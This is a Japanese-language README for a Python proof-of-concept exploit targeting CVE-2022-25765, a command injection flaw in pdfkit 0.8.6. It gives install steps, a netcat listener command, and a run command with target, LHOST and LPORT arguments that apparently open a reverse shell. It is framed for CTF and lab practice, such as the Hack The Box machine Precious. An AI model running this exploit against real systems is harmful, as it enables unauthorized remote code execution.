
Python製のCVE-2022-25765向け概念実証(PoC)。pdfkitにおけるコマンドインジェクションの脆弱性で、細工されたPDF生成を介してリモートコード実行を可能にします。
CVE-2022-25765 のPoC。脆弱なバージョンの pdfkit に影響します。
pdfkit 0.8.6 でテスト済みです。
requestscolorama依存関係をインストールします:
pip3 install -r requirements.txt
または手動で:
pip3 install requests colorama
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>
例: リスナーを実行します
nc -lvnp 4242
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444
リポジトリをクローンします:
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765
要件をインストールします:
pip3 install -r requirements.txt
ラボのターゲットに対してPoCを実行します。
CVE-2022-25765 は、脆弱なバージョンの pdfkit におけるコマンドインジェクションの脆弱性です。
この問題は、PDF生成プロセスに渡されるユーザー制御の入力に対するサニタイズ処理が不十分であることに関連しています。
このPoCは主に学習およびCTF/ラボ環境向けに作成されました。
試す場所をお探しなら、Hack The Box のマシン: Precious がおすすめです。
これは、所有しているシステム、または明示的なテスト許可を得たシステムに対してのみ使用してください。
このプロジェクトの誤用や損害について、私は一切の責任を負いません。
INNOCENTx0